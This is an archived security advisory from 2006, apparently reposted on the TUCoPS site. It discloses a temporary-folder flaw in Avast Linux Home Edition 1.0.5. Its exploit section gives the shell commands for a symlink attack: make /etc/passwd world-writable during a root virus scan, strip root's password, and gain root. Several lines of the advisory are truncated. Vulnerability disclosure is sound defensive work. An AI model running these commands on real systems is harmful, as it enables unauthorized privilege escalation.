Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Security App Flaws :: b06-1619.htm

Avast linux home edition (vulnerability on a temporary folder creation)
Avast Linux Home Edition (vulnerability on a temporary folder creation)
Avast Linux Home Edition (vulnerability on a temporary folder creation)

Title      : Avast Linux Home Edition, vulnerability on a temporary folder 
Protuct    : Avast! Linux Home Edition
Product : 
Version    : 1.0.5, 1.0.5-1
Vuln Found : 2006-04-14 (tested on RedHat Entreprise 4 Update 3).

Introduction :
Avast Linux Home Edition represents an antivirus solution for the Linux 
When it scans for virus, it creates a temporary directory in /tmp in an 
manner and gives it an chmod equal to 1777.

Exploit :
$ ls -l /etc/passwd
-rw-r--r--  1 root root 1476 avr 14 15:30 /etc/passwd
$ ln -s /etc/passwd /tmp/_avast4_
$ ll /tmp/_avast4_
lrwxrwxrwx  1 user user 11 avr 14 16:43 /tmp/_avast4_ -> /etc/passwd
Waiting for user root to scan for virus (example: # avast -d /bin)
$ ls -l /etc/passwd
-rwxrwxrwt  1 root root 1476 avr 14 15:55 /etc/passwd             (Oops!)
$ sed s/^root:x:/root::/ /etc/passwd > /tmp/a.out
$ cat /tmp/a.out > /etc/passwd
$ su -
# id
uid=0(root) gid=0(root) 

Note :
When the root user is launching avast for the first time, the "_avast4_" 
is not erased when virus scan is finished, so it may be difficult for a user 
to create
the symbolic link. But we must not forget that distribs usualy clean there 
/tmp folder
via the tmpwatch utility.

Julian L.

Express yourself instantly with MSN Messenger! Download today it's FREE! 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH